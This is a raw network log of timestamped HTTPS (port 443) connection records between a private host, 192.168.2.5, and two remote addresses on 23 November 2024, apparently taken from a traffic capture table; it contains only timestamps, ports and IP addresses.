                                                                                                                                                                                          Nov 23, 2024 17:45:43.911317110 CET49950443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:43.911322117 CET4434995013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.212625980 CET4434994913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.215810061 CET4434994913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.215893984 CET49949443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.215923071 CET4434994913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.215996027 CET49949443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.216062069 CET49949443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.216095924 CET4434994913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.216144085 CET49949443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.216160059 CET4434994913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.219919920 CET49955443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.219944000 CET4434995513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.220030069 CET49955443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.220273018 CET49955443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.220285892 CET4434995513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.236373901 CET4434995313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.237063885 CET49953443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.237071037 CET4434995313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.237703085 CET49953443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.237710953 CET4434995313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.333882093 CET4434995113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.336626053 CET4434995113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.336698055 CET49951443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.336725950 CET4434995113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.336791992 CET4434995113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.336849928 CET49951443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.336900949 CET49951443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.336901903 CET49951443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.336920977 CET4434995113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.336942911 CET4434995113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.340435982 CET49956443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.340492010 CET4434995613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.340569973 CET49956443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.340754986 CET49956443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.340774059 CET4434995613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.342262983 CET4434995413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.343034983 CET49954443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.343056917 CET4434995413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.343703032 CET49954443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.343708992 CET4434995413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.362097979 CET4434995013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.365487099 CET4434995013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.365560055 CET49950443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.365617037 CET49950443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.365622997 CET4434995013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.365644932 CET49950443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.365648031 CET4434995013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.368562937 CET49957443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.368649006 CET4434995713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.368756056 CET49957443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.368931055 CET49957443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.368966103 CET4434995713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.841995001 CET4434995313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.842209101 CET4434995313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.842293978 CET49953443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.842561960 CET49953443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.842575073 CET4434995313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.842598915 CET49953443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.842602968 CET4434995313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.846766949 CET49958443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.846822023 CET4434995813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.846921921 CET49958443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.847165108 CET49958443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.847179890 CET4434995813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.941030025 CET4434995413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.944291115 CET4434995413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.944365978 CET49954443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.944438934 CET49954443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.944458008 CET4434995413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.944469929 CET49954443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.944478035 CET4434995413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.947639942 CET49959443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.947724104 CET4434995913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.947832108 CET49959443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.947993040 CET49959443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:44.948029995 CET4434995913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.260504961 CET4434995513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.261214972 CET49955443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.261229992 CET4434995513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.261713028 CET49955443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.261718988 CET4434995513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.291760921 CET4434995613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.292582989 CET49956443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.292596102 CET4434995613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.293095112 CET49956443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.293102026 CET4434995613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.318299055 CET4434995713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.318798065 CET49957443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.318856001 CET4434995713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.319348097 CET49957443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.319364071 CET4434995713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.718053102 CET49960443192.168.2.5216.58.208.228
                                                                                                                                                                                          Nov 23, 2024 17:45:46.718102932 CET44349960216.58.208.228192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.718183041 CET49960443192.168.2.5216.58.208.228
                                                                                                                                                                                          Nov 23, 2024 17:45:46.718498945 CET49960443192.168.2.5216.58.208.228
                                                                                                                                                                                          Nov 23, 2024 17:45:46.718516111 CET44349960216.58.208.228192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.735462904 CET4434995513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.735654116 CET4434995513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.735743999 CET49955443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.735820055 CET49955443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.735820055 CET49955443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.735832930 CET4434995513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.735841990 CET4434995513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.739200115 CET49961443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.739238977 CET4434996113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.739342928 CET49961443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.739516973 CET49961443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.739536047 CET4434996113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.758472919 CET4434995613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.758550882 CET4434995613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.758604050 CET49956443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.758702040 CET49956443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.758721113 CET4434995613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.758733034 CET49956443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.758740902 CET4434995613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.761112928 CET49962443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.761193037 CET4434996213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.761267900 CET49962443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.761384964 CET49962443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.761404991 CET4434996213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.789169073 CET4434995713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.790795088 CET4434995813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.791218042 CET49958443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.791229010 CET4434995813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.791799068 CET49958443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.791804075 CET4434995813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.792126894 CET4434995713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.792205095 CET49957443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.792279005 CET49957443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.792279005 CET49957443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.792320967 CET4434995713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.792354107 CET4434995713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.794622898 CET49963443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.794656992 CET4434996313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.794728041 CET49963443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.794960976 CET49963443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.794980049 CET4434996313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.821398020 CET4434995913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.821811914 CET49959443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.821858883 CET4434995913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:46.822350979 CET49959443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:46.822361946 CET4434995913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:47.278330088 CET4434995913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:47.281296015 CET4434995913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:47.281368971 CET49959443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:47.281466961 CET49959443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:47.281467915 CET49959443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:47.281512976 CET4434995913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:47.281539917 CET4434995913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:47.284308910 CET49964443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:47.284348965 CET4434996413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:47.284434080 CET49964443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:47.284600019 CET49964443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:47.284616947 CET4434996413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:47.286372900 CET4434995813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:47.290097952 CET4434995813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:47.290144920 CET49958443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:47.290164948 CET4434995813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:47.290194035 CET4434995813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:47.290230989 CET49958443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:47.290252924 CET49958443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:47.290271044 CET4434995813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:47.290282965 CET49958443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:47.290288925 CET4434995813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:47.292440891 CET49965443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:47.292504072 CET4434996513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:47.292578936 CET49965443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:47.292702913 CET49965443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:47.292725086 CET4434996513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:48.451457977 CET44349960216.58.208.228192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:48.451796055 CET49960443192.168.2.5216.58.208.228
                                                                                                                                                                                          Nov 23, 2024 17:45:48.451823950 CET44349960216.58.208.228192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:48.452284098 CET44349960216.58.208.228192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:48.453243017 CET49960443192.168.2.5216.58.208.228
                                                                                                                                                                                          Nov 23, 2024 17:45:48.453365088 CET44349960216.58.208.228192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:48.498990059 CET49960443192.168.2.5216.58.208.228
                                                                                                                                                                                          Nov 23, 2024 17:45:48.536487103 CET4434996313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:48.537066936 CET49963443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:48.537091970 CET4434996313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:48.537831068 CET49963443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:48.537837029 CET4434996313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:48.551970959 CET4434996213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:48.552409887 CET49962443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:48.552454948 CET4434996213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:48.552921057 CET49962443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:48.552933931 CET4434996213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:48.598229885 CET4434996113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:48.598651886 CET49961443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:48.598675966 CET4434996113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:48.599076986 CET49961443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:48.599083900 CET4434996113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:48.892263889 CET4434996513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:48.892898083 CET49965443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:48.892935038 CET4434996513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:48.893388987 CET49965443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:48.893395901 CET4434996513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:48.975873947 CET4434996313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:48.975931883 CET4434996313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:48.975986004 CET4434996313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:48.976018906 CET49963443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:48.976059914 CET49963443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:48.976277113 CET49963443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:48.976303101 CET4434996313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:48.976319075 CET49963443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:48.976325989 CET4434996313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:48.978930950 CET49966443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:48.978970051 CET4434996613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:48.979054928 CET49966443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:48.979191065 CET49966443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:48.979208946 CET4434996613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.001852036 CET4434996213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.005604029 CET4434996213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.005685091 CET49962443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:49.005790949 CET49962443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:49.005791903 CET49962443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:49.005835056 CET4434996213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.005862951 CET4434996213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.007899046 CET49967443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:49.007930994 CET4434996713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.008003950 CET49967443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:49.008167028 CET49967443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:49.008179903 CET4434996713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.074604034 CET4434996113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.078563929 CET4434996113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.078655958 CET49961443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:49.078681946 CET4434996113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.078741074 CET4434996113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.078794956 CET49961443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:49.078818083 CET4434996113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.078850031 CET49961443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:49.078856945 CET4434996113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.082398891 CET49968443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:49.082446098 CET4434996813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.082535982 CET49968443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:49.082731962 CET49968443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:49.082751989 CET4434996813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.096715927 CET4434996413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.097155094 CET49964443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:49.097182035 CET4434996413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.097644091 CET49964443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:49.097650051 CET4434996413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.331185102 CET4434996513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.334187984 CET4434996513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.334258080 CET49965443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:49.334310055 CET4434996513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.334346056 CET4434996513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.334398985 CET49965443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:49.334472895 CET49965443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:49.334472895 CET49965443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:49.334507942 CET4434996513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.334531069 CET4434996513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.337488890 CET49969443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:49.337560892 CET4434996913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.337636948 CET49969443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:49.337829113 CET49969443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:49.337847948 CET4434996913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.552922964 CET4434996413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.555963039 CET4434996413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.556034088 CET49964443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:49.556109905 CET49964443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:49.556127071 CET4434996413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.559391975 CET49970443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:49.559447050 CET4434997013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:49.559525967 CET49970443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:49.559696913 CET49970443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:49.559716940 CET4434997013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:50.724756956 CET4434996613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:50.725442886 CET49966443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:50.725466013 CET4434996613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:50.725972891 CET49966443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:50.725980043 CET4434996613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:50.811204910 CET4434996713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:50.811784029 CET49967443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:50.811836004 CET4434996713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:50.812274933 CET49967443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:50.812289953 CET4434996713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:50.836540937 CET4434996813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:50.836901903 CET49968443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:50.836934090 CET4434996813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:50.837277889 CET49968443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:50.837286949 CET4434996813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:51.166439056 CET4434996613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:51.169914961 CET4434996613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:51.169979095 CET49966443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:51.170013905 CET49966443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:51.170030117 CET4434996613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:51.170057058 CET49966443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:45:51.170063972 CET4434996613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:51.173471928 CET49971443192.168.2.513.107.246.63
